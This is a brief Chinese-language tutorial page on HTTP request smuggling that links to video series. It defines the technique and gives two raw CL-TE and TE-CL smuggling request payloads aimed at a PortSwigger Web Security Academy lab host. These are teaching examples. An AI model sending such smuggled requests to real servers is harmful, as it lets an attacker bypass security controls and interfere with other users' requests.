Http Smuggling

YouTube系列教程

B站系列教程

什么是 Http Smuggling

HTTP请求走私是一种干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术。请求走私漏洞本质上通常很关键，它使攻击者可以绕过安全控制，未经授权访问敏感数据并直接危害其他应用程序用户。

CL(TE) - TE(CL)

• Content-Length
• Transfer-Encoding

TE-CL

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: x
Transfer-Encoding: chunked

aa

GET /404 HTTP/1.1
X-Ignore: X

0

CL-TE

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

0